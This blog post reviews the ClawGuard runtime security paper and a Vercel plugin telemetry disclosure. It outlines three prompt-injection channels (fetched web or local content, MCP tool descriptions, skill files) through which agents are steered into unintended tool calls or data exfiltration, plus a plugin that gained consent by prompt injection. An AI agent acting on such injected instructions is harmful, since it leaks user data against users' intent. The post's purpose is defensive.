← All Posts

Runtime Defense for Tool-Augmented Agents

From the guide: Claude Code Comprehensive Guide

A week ago I published 50 MCP vulnerabilities across SSRF, tool poisoning, and trust bypass patterns. The implicit conclusion was grim: the attack surface is growing faster than the audit capacity. A new paper from Wei Zhao, Zhe Li, Peixin Zhang, and Jun Sun proposes a structural answer — and a real-world telemetry incident the same week demonstrates exactly why the answer matters.

ClawGuard, published April 13 on arxiv, is a runtime security framework that enforces a user-confirmed rule set at every tool-call boundary.1 In its evaluated configuration, the framework applies basic access-control rules — blocking unauthorized file access, preventing credential exfiltration, restricting network calls — before any external tool invocation. No model modification. No infrastructure change. No safety-specific fine-tuning.1 The authors tested across AgentDojo, SkillInject, and MCPSafeBench using five frontier LLMs.1 The paper also describes a task-specific rule-induction component that would automatically derive constraints from the user’s stated objective, but this was not part of the evaluated configuration.

The claim that matters: ClawGuard transforms alignment-dependent defense into a deterministic, auditable mechanism.1

Why Alignment Is Not a Security Boundary

Many of the MCP vulnerabilities I cataloged last week exploit a common structural gap. The agent receives instructions from a tool description, a fetched web page, or a skill file — and the only thing standing between that injection and execution is the model’s ability to distinguish legitimate instructions from adversarial ones. (Some vulnerabilities — SSRF, RCE, path traversal — exploit server-side flaws that do not depend on model instruction-following at all, but the tool-call boundary remains relevant for defense.)

Alignment training helps. RLHF makes models more likely to refuse harmful requests. But “more likely” is not a security property. A model that refuses 99% of prompt injections still fails 1% of the time, and an attacker who controls the input can iterate until that 1% hits. The tool poisoning pattern does not even need the model to fail — the poisoned description makes the malicious action look like the intended one.

Runtime interception operates at a different layer entirely. A hook or policy engine that inspects a tool call before execution does not depend on whether the model understood the attack. The check is deterministic: does the call match the allowed set, or does it not?

Three Injection Channels, One Enforcement Point

ClawGuard identifies three attack channels for tool-augmented agents:1

Web and local content injection. The agent reads a web page or local file containing adversarial instructions. The instructions direct the agent to call tools in ways the user did not intend. The silent egress attack surface is one instance of this pattern — exfiltration instructions hidden in fetched content.

MCP server injection. A compromised or malicious MCP server embeds instructions in tool descriptions or response payloads. The agent reads those instructions as context and acts on them. The 50-vulnerability catalog from last week documents this channel extensively.

Skill file injection. Adversarial instructions placed in skill files and configuration that the agent loads as trusted context. The agent treats skill file content as authoritative — an attacker who can write to a skill file or configuration can direct the agent’s behavior.

The defense architecture places enforcement at the tool-call boundary — the single point where every external action must pass regardless of which channel injected the instruction.1 Before the agent invokes any tool, ClawGuard checks the call against its rule set. In the evaluated configuration, those rules are basic access-control constraints (file path restrictions, network call allowlists, credential access blocks). A call that falls outside those constraints is blocked, no matter how convincing the injection prompt was.

The architectural insight is worth stating plainly: you do not need to detect every injection if you can enforce policy at the execution boundary.

The Vercel Telemetry Incident

Four days before the ClawGuard paper dropped, Akshay Chugh published a disclosure about the Vercel Plugin for Claude Code on April 9.2 The findings at the time of disclosure:

The plugin registered hooks that sent bash command strings to telemetry.vercel.com.2 A persistent UUID stored at ~/.claude/vercel-plugin-device-id tied those command strings to a device.2 The plugin used empty string matchers on its hooks, which meant the hooks fired on all projects — not just Vercel projects.2 The consent mechanism used a prompt injection rather than native UI to obtain user agreement.2 Telemetry fired on every matched event unless the user set VERCEL_PLUGIN_TELEMETRY=off.2

Vercel addressed the telemetry concerns on April 14, removing the broad matchers and prompt-based consent mechanism.2

The Vercel incident is not a vulnerability in the traditional sense. Nobody is stealing credentials. But it demonstrates the exact class of problem that runtime defense addresses: a hook that fires broader than the user intended, collecting data the user did not explicitly consent to share, through a mechanism that circumvents native consent UI.

Replace “telemetry” with “exfiltration” and the architecture is identical. A hook with an overly broad matcher, running on every project, sending data to an external endpoint. The difference between telemetry and attack is intent — and intent is not auditable at runtime.

From Paper to Practice: What Practitioners Already Have

ClawGuard formalizes something practitioners have been building informally. Claude Code ships with a hook system that supports PreToolUse and PostToolUse interception. I run 95+ hooks that enforce file path restrictions, validate tool inputs, and gate destructive operations behind explicit confirmation.3

The gap between my hooks and ClawGuard’s vision is automation. My hooks are hand-written rules: block internal IP addresses in MCP inputs, restrict file writes to project directories, require approval for git force-push. The evaluated ClawGuard configuration uses basic access-control rules similar in spirit to hand-written hooks. The paper’s proposed task-specific rule-induction component would automatically derive constraints from the user’s stated objective1 — instead of writing “block writes to /etc,” the framework would infer that a task described as “refactor the login module” should not need write access to system directories. That component remains future work.

Automatic constraint derivation is the harder problem — and ClawGuard’s task-specific rule-induction component represents future work, not evaluated results. The basic-rule configuration that the authors did evaluate showed strong but not perfect results: AgentDojo reached 0% attack success rate (ASR), but SkillInject still saw 4.8-14% ASR and MCPSafeBench showed 7.1-11.0% ASR depending on the model.1 Hand-written rules are brittle — they cover the attacks you anticipated. Derived constraints could cover attacks you did not anticipate, because they operate on the positive set (what should happen) rather than the negative set (what should not).

Whether automatic derivation works reliably in production is an open question. The benchmarks are controlled environments. Real agent sessions involve ambiguous tasks, multi-step tool chains, and tool calls that look anomalous but are legitimate. False positives that block valid tool calls would erode the “without compromising agent utility” claim quickly.

The Layered Defense Stack

Runtime defense is not a single mechanism. The practical stack for tool-augmented agents has at least four layers:

Layer 1: Input validation. Hooks that inspect tool call arguments before execution. Block internal IP addresses, validate file paths, reject shell metacharacters. My PreToolUse hooks operate at this layer. Low false-positive rate, but only catches known-bad patterns.

Layer 2: Basic rule enforcement. Restrict the set of allowed tools and allowed arguments based on access-control rules (path restrictions, network allowlists, credential guards). ClawGuard’s evaluated configuration operates at this layer.1 The paper also proposes task-scoped constraint derivation, which would sit between this layer and the next, but that component remains future work. Higher coverage than input validation alone, but rules must be maintained as the environment changes.

Layer 3: Output inspection. PostToolUse hooks that examine tool results before the agent processes them. Catches data exfiltration, detects anomalous responses, flags unexpected tool behavior. The middleman post documented why output inspection matters — a compromised router modifies responses after generation.

Layer 4: Session audit. Logging every tool call, every argument, every result for post-hoc review. Not a prevention mechanism, but a detection one. Akshay Chugh uncovered the Vercel telemetry incident through exactly this kind of audit — reading the hook configuration and tracing what the hooks were doing.2

No single layer is sufficient. Input validation misses novel patterns. Task-scoped constraints can be too restrictive or too permissive. Output inspection adds latency. Session audit catches problems after the damage. The stack works because each layer covers gaps the others leave.

What ClawGuard Gets Right

The paper makes three contributions that matter for practitioners:

Determinism over alignment. Framing runtime defense as a deterministic mechanism rather than an alignment property is the correct framing. Alignment is a training-time property that degrades under adversarial conditions. Deterministic enforcement is a runtime property that holds regardless of model behavior. The distinction sounds academic, but it changes what you can promise about your system’s security posture.

Channel-agnostic enforcement. Defending against web injection, MCP injection, and skill file injection with a single enforcement point is architecturally sound. Three separate defenses for three injection channels would create a maintenance burden and leave gaps at the intersections. A single enforcement point at the tool-call boundary covers all three channels by construction.

No model modification required. Requiring neither fine-tuning nor architectural modification means the defense works with any model, including models you do not control. An operator running Claude Code, Codex CLI, or any other agent framework can add runtime defense without waiting for the model provider to ship a safety update.

What Remains Open

ClawGuard tested on benchmarks. Production agent sessions are messier. Several questions remain before practitioners can rely on automatic constraint derivation:

Ambiguous tasks. “Help me with this project” does not specify which tools or paths are in scope. Deriving constraints from vague objectives risks either blocking legitimate calls (too restrictive) or allowing dangerous ones (too permissive).

Multi-step chains. An agent that needs to read a config file, call an API, and write results to a database has a complex access pattern. Constraints derived from the initial task description may not anticipate intermediate steps.

Adversarial task descriptions. If the constraint derivation depends on the user’s stated objective, an attacker who controls the task description (through a shared workspace, a poisoned issue tracker, or a manipulated project file) can influence the constraints themselves.

Performance cost. Evaluating constraints at every tool-call boundary adds latency. The paper claims the framework preserves utility, but does not report latency measurements.1 For interactive agent sessions, even 200ms per tool call changes the user experience.

Operational Takeaways

For practitioners running tool-augmented agents today:

Deploy PreToolUse hooks now. You do not need to wait for ClawGuard or any other framework. Claude Code’s hook system supports tool-call interception today. Start with input validation — block internal addresses, restrict file paths, gate destructive operations. The hooks tutorial covers the implementation.

Audit your hook matchers. The Vercel incident happened because empty string matchers fired on all projects.2 Review every hook in your .claude/settings.json and verify that each matcher targets only the intended context. A hook with an overly broad matcher is a liability, not a defense.

Log every tool call. Session audit is the lowest-effort, highest-value defense layer. Even if you cannot prevent every attack, you can detect it after the fact — but only if you have logs.

Evaluate ClawGuard against your stack. The paper links a repository, though code had not yet been published at time of writing. When available, evaluate the basic-rule configuration against your existing hook stack. If the task-specific rule-induction component matures, automatic constraint derivation would complement hand-written rules, not replace them.

Treat configuration as a trust boundary. Skill files, hooks configuration, MCP server definitions — every file that influences agent behavior is an attack surface. Apply the same access controls you would apply to production credentials.

The MCP vulnerability catalog documented the attack surface. ClawGuard proposes a defense architecture. The Vercel incident demonstrates why both matter. Runtime defense at the tool-call boundary is the enforceable layer — not because alignment does not help, but because enforcement does not depend on it.


Sources

Frequently Asked Questions

How does ClawGuard differ from Claude Code’s built-in permission system?

Claude Code’s permission system supports both tool-level approval (approve or deny tool categories) and argument-level specifiers (e.g., Bash(git diff *) to allow only matching commands). ClawGuard’s evaluated configuration enforces basic access-control rules at the argument level. Its proposed task-specific rule-induction component would automatically derive argument constraints from the current task, but that component was not part of the evaluated results. The two systems are complementary: Claude Code permissions gate which tools and argument patterns can run, while ClawGuard-style runtime constraints add a second enforcement layer.

Do I need to wait for ClawGuard to ship before adding runtime defense?

No. Claude Code’s hook system supports PreToolUse and PostToolUse interception today. Hand-written hooks that validate tool inputs cover the most common attack patterns immediately. ClawGuard’s contribution is automatic constraint derivation, which would augment manual rules rather than replace them.

Was the Vercel telemetry incident a security vulnerability?

The disclosure described a privacy and consent issue rather than a traditional vulnerability. At the time of disclosure, the plugin collected bash command strings from all projects and sent them to an external endpoint without explicit opt-in through native UI. Vercel has since addressed these concerns. The architectural pattern — broad hook matchers, external data transmission, non-native consent — remains instructive because it mirrors the same pattern a malicious hook would use for data exfiltration.

What is the performance impact of runtime tool-call interception?

For hand-written hooks using shell scripts or lightweight validators, the overhead should stay under 200ms per tool call in my operational experience. The ClawGuard paper does not report latency measurements for its constraint evaluation, which may add additional overhead. For interactive sessions, latency per tool call matters — test before deploying complex validation logic.


  1. Wei Zhao, Zhe Li, Peixin Zhang, Jun Sun. ClawGuard: A Runtime Security Framework for Tool-Augmented LLM Agents. arXiv:2604.11790v1, April 13, 2026. Runtime defense framework enforcing user-confirmed rule set at tool-call boundaries, tested on AgentDojo, SkillInject, and MCPSafeBench across five LLMs. 

  2. Akshay Chugh. Vercel Plugin Telemetry Disclosure. April 9, 2026. Analysis of Vercel Plugin for Claude Code sending bash command strings to telemetry.vercel.com via hooks with empty string matchers. Vercel subsequently addressed the concerns raised. 

  3. Blake Crosley. Claude Code Hooks Tutorial. blakecrosley.com. PreToolUse and PostToolUse hook implementation patterns for Claude Code. 

Related Posts

Claude Code as Infrastructure

Claude Code is not an IDE feature. It is infrastructure. 84 hooks, 48 skills, 19 agents, and 15,000 lines of orchestrati…

12 min read

The Ralph Loop: How I Run Autonomous AI Agents Overnight

I built an autonomous agent system with stop hooks, spawn budgets, and filesystem memory. Here are the failures and what…

8 min read